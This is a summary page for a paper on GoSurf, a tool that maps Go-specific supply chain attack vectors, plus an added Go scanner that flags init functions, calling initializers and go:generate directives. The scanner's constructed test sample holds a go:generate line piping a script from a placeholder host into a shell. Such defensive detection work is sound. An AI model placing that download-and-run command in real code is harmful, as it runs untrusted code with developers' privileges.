GoSurf: Identifying Software Supply Chain Attack Vectors in Go
Carmine Cesarano, Vivi Andersson, Roberto Natella, Martin Monperrus

TL;DR
GoSurf is a static analysis tool that surfaces the supply chain attack vectors specific to the Go language present in a package: Go features that, while benign by design, can be misused to hide malicious code in open-source dependencies. Its output helps maintainers decide where to audit.
Contribution
The paper introduces a novel taxonomy of 12 Go-specific attack vectors and presents GoSurf, a tool that analyzes Go packages for the attack surface these vectors expose. These are attack vectors, not vulnerabilities: each flags a language feature an attacker could misuse, not confirmed malicious code.
Findings
GoSurf successfully identified attack vectors in real-world Go packages.
The taxonomy highlights language features exploitable for malicious purposes.
Preliminary results aid developers in prioritizing security audits.
Abstract
In Go, the widespread adoption of open-source software has led to a flourishing ecosystem of third-party dependencies, which are often integrated into critical systems. However, the reuse of dependencies introduces significant supply chain security risks, as a single compromised package can have cascading impacts. Existing supply chain attack taxonomies overlook language-specific features that can be exploited by attackers to hide malicious code. In this paper, we propose a novel taxonomy of 12 distinct attack vectors tailored for the Go language and its package lifecycle. Our taxonomy identifies patterns in which language-specific Go features, intended for benign purposes, can be misused to propagate malicious code stealthily through supply chains. Additionally, we introduce GoSurf, a static analysis tool that analyzes the attack surface of Go packages according to our proposed…
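The abstract describes GoSurf as a static analysis that looks for Go features which can carry or trigger code implicitly, but this page does not list the 12 vectors. The scanner below is an added example written for this page, not the paper's GoSurf tool or its code. It uses the standard go/ast package to flag three such features in a single source file: init functions (run automatically when the package is imported), package-level variable initializers that call a function (also run on import), and //go:generate directives (arbitrary commands run by `go generate`). Whether these three are among the paper's 12 vectors is an assumption here; the sample source it scans is constructed for the example and is only parsed, never built or executed.

```go
package main

import (
	"fmt"
	"go/ast"
	"go/parser"
	"go/token"
	"strings"
)

// Finding is one attack-surface hit: which Go feature, on which line, and why it matters.
type Finding struct {
	Kind string // "init-func", "global-init-call" or "go-generate"
	Line int
	Note string
}

// ScanSource parses one Go file and reports constructs that execute code without
// an explicit call from the importer (on import, or during `go generate`).
// These are review prompts, not proof of malicious intent.
func ScanSource(filename, src string) ([]Finding, error) {
	fset := token.NewFileSet()
	f, err := parser.ParseFile(fset, filename, src, parser.ParseComments)
	if err != nil {
		return nil, err
	}
	var out []Finding
	for _, decl := range f.Decls {
		switch d := decl.(type) {
		case *ast.FuncDecl:
			// 1. init functions run automatically when the package is imported.
			if d.Recv == nil && d.Name.Name == "init" {
				out = append(out, Finding{"init-func", fset.Position(d.Pos()).Line, "runs on import"})
			}
		case *ast.GenDecl:
			// 2. package-level var initializers that call a function also run on import.
			if d.Tok != token.VAR {
				continue
			}
			for _, spec := range d.Specs {
				vs := spec.(*ast.ValueSpec)
				for i, v := range vs.Values {
					if !callsFunc(v) {
						continue
					}
					name := "_"
					if i < len(vs.Names) {
						name = vs.Names[i].Name
					}
					out = append(out, Finding{"global-init-call", fset.Position(v.Pos()).Line,
						"initializer of var " + name + " calls a function on import"})
				}
			}
		}
	}
	// 3. //go:generate directives: the command runs with the developer's privileges on `go generate`.
	for _, cg := range f.Comments {
		for _, c := range cg.List {
			if strings.HasPrefix(c.Text, "//go:generate ") {
				out = append(out, Finding{"go-generate", fset.Position(c.Pos()).Line,
					strings.TrimPrefix(c.Text, "//go:generate ")})
			}
		}
	}
	return out, nil
}

// callsFunc reports whether expr contains a call expression anywhere inside it.
func callsFunc(expr ast.Expr) bool {
	found := false
	ast.Inspect(expr, func(n ast.Node) bool {
		if _, ok := n.(*ast.CallExpr); ok {
			found = true
		}
		return !found
	})
	return found
}

// sample is a constructed Go file for this example (the URL is a placeholder, never fetched).
const sample = `package sample

import "os/exec"

//go:generate sh -c "curl -s https://example.invalid/setup.sh | sh"

var token = loadToken() // initializer calls a function: runs on import
var version = "1.2.3"   // plain literal: not flagged

func loadToken() string { return "" }

func init() {
	exec.Command("sh", "-c", "echo hi").Run()
}

func Helper() string { return "ok" }
`

func main() {
	findings, err := ScanSource("sample.go", sample)
	if err != nil {
		panic(err)
	}
	for _, f := range findings {
		fmt.Printf("%-17s line %2d  %s\n", f.Kind, f.Line, f.Note)
	}
}
```

Running it on the constructed sample reports the var initializer on line 7, the init function on line 12 and the go:generate directive on line 5. A real scan would walk every file of every module in the build list, since a vector hidden in a transitive dependency reaches the importer just the same; the point of the example is that all three hits come from ordinary, documented Go features, which is why a taxonomy of them is useful for prioritizing manual audits.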
Taxonomy
Topics: Advanced Malware Detection Techniques · Information and Cyber Security · Network Security and Intrusion Detection
